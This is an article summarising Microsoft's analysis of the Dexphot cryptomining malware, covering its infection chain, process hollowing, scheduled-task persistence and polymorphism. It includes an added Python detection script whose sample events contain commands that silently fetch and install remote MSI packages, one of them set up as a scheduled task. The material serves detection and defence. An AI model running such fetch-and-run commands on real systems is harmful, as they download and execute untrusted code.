Microsoft has been tracking a malware campaign for more than a year that uses numerous evasion techniques, including random file names, fileless installation and polymorphism.
Microsoft, which calls the malware Dexphot, found that it tried to deploy files that changed 2 or 3 times an hour. The polymorphic malware targeted thousands of devices, executed code directly in memory and hijacked legitimate processes to evade detection.
The large-scale activity observed at first declined over time, and only a few machines now show malicious activity related to Dexphot.
A Dexphot infection begins with five files written to disk: an installer containing two URLs, an MSI file, a password-protected ZIP archive, a loader DLL extracted from that archive, and an encrypted data file containing three additional executables.
During execution, the malware uses numerous legitimate system processes, such as msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe and powershell.exe, in both the early and the later stages of the infection.
SoftwareBundler:Win32/ICLoader and its variants drop and execute the Dexphot installer. The installer then uses two URLs to download the malicious payloads (the same URLs are later used for persistence, updates and reinfection).
An MSI package is downloaded from one of the URLs and installed silently with msiexec.exe. When the installation process begins, a batch script included in the Dexphot package is run first to check for antivirus products.
The script checks for Avast, AVG and Windows Defender Antivirus and halts the infection if one of them is detected.
If none is found, the password-protected ZIP archive is decompressed to extract the loader DLL, an encrypted data file and an unrelated DLL.
Process hollowing is then used: the loader DLL starts two legitimate system processes in a suspended state, replaces their contents with two malicious executables, and then resumes them.
The configuration.exe process is targeted in the same way and replaced by a third executable, a cryptocurrency miner.
The first two executables are Dexphot's monitoring services, which keep the infection running. Each checks the status of all three malicious processes and starts reinfection if any of them is terminated. The monitoring services also watch for cmd.exe processes and terminate them immediately.
The malware also creates scheduled tasks as a fail-safe persistence mechanism. These tasks run malicious code using msiexec.exe as a proxy to update the components.
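The chain described above (a silent MSI install from a URL, unzip.exe and rundll32.exe running under msiexec.exe, legitimate system processes hollowed by the loader, and scheduled tasks that use msiexec.exe as a proxy) maps to behaviours that are visible in ordinary process-creation telemetry. The Python below is an added example written for this page, not Microsoft's tooling or a real Dexphot artefact: the event record shape, the rule heuristics and the sample events are all constructed for illustration.

```python
"""Behavioural rules for the Dexphot-style infection chain, run over
constructed process-creation events (added example, not real telemetry)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str         # image file name of the new process, lower-case
    cmdline: str
    parent_image: str  # image file name of the parent, lower-case


# Constructed sample events modelled on the chain in the article.
# URLs use the reserved .invalid TLD and are not real Dexphot domains.
SAMPLE_EVENTS = [
    ProcEvent(100, "msiexec.exe",
              "msiexec.exe /i http://example.invalid/random123.msi /q",
              "installer.exe"),
    ProcEvent(101, "cmd.exe", "cmd.exe /c check_av.bat", "msiexec.exe"),
    ProcEvent(102, "unzip.exe", "unzip.exe -P s3cret payload.zip", "msiexec.exe"),
    ProcEvent(103, "rundll32.exe", "rundll32.exe loader.dll,Start", "msiexec.exe"),
    ProcEvent(104, "svchost.exe", "svchost.exe", "rundll32.exe"),
    ProcEvent(105, "schtasks.exe",
              'schtasks.exe /create /tn Update /sc minute '
              '/tr "msiexec.exe /i http://example.invalid/x.msi /q"',
              "svchost.exe"),
    ProcEvent(106, "notepad.exe", "notepad.exe", "explorer.exe"),
    # Benign: a silent install from a local path should not fire the URL rule.
    ProcEvent(107, "msiexec.exe", "msiexec.exe /i C:\\Users\\u\\app.msi /q", "explorer.exe"),
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# msiexec quiet switches: /q, /qn, /quiet as standalone tokens.
SILENT_RE = re.compile(r"(^|\s)/(q|qn|quiet)(\s|$)", re.IGNORECASE)


def rule_silent_msi_from_url(ev: ProcEvent) -> Optional[str]:
    """MSI installed silently straight from a remote URL."""
    if ev.image == "msiexec.exe" and URL_RE.search(ev.cmdline) and SILENT_RE.search(ev.cmdline):
        return "msiexec.exe silent install from remote URL"
    return None


def rule_unzip_under_msiexec(ev: ProcEvent) -> Optional[str]:
    """unzip.exe launched by the installer (password-protected payload extraction)."""
    if ev.image == "unzip.exe" and ev.parent_image == "msiexec.exe":
        return "unzip.exe spawned by msiexec.exe"
    return None


def rule_child_of_rundll32(ev: ProcEvent) -> Optional[str]:
    """Heuristic (assumption): rundll32.exe rarely spawns processes itself, so a
    new process with rundll32.exe as parent is a candidate hollowing target."""
    if ev.parent_image == "rundll32.exe":
        return "process spawned by rundll32.exe (possible hollowing target)"
    return None


def rule_schtasks_msiexec_proxy(ev: ProcEvent) -> Optional[str]:
    """Scheduled task whose action is msiexec.exe (persistence via a proxy binary)."""
    cl = ev.cmdline.lower()
    if ev.image == "schtasks.exe" and "/create" in cl and "msiexec" in cl:
        return "scheduled task created that runs msiexec.exe"
    return None


RULES = [rule_silent_msi_from_url, rule_unzip_under_msiexec,
         rule_child_of_rundll32, rule_schtasks_msiexec_proxy]


def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, finding) pairs for every event that matches a rule."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append((ev.pid, hit))
    return findings


def distinct_stages(findings: List[Tuple[int, str]]) -> int:
    """Number of distinct chain stages observed; several together is the signal,
    since each behaviour alone can occur in benign software deployment."""
    return len({finding for _, finding in findings})


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for pid, finding in hits:
        print(f"pid {pid}: {finding}")
    print("distinct stages:", distinct_stages(hits))
```

Each rule on its own would be noisy in an environment that deploys software with MSI packages, which is why `distinct_stages` counts how many stages of the chain appear on a host; correlating the stages, rather than alerting on any one of them, is what makes a behavioural approach hold up against the file-level polymorphism discussed later in the article.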
Polymorphism is applied at several levels. Each MSI package is unique in the files it includes: a clean copy of unzip.exe, a password-protected ZIP file and a batch script. The script is not always present, and the names of the other files and the ZIP file's password change from package to package.
The contents of the loader DLL and of the encrypted data file inside the ZIP are the same from one package to the next.
The domains used in the attacks follow a similar pattern, and the payload file names are randomly generated. Many of the domains were in use for a long time, but the MSI packages hosted on them were changed or updated frequently. In total, Microsoft identified about 200 unique Dexphot domains.
“Dexphot is not the kind of attack that generates mainstream media attention. It is one of numerous malware campaigns that are active at any given time. Dexphot illustrates the level of complexity and evolution of even daily threats, aimed at avoiding protection, and motivated to fly under the radar with a view to profit,” concludes Microsoft.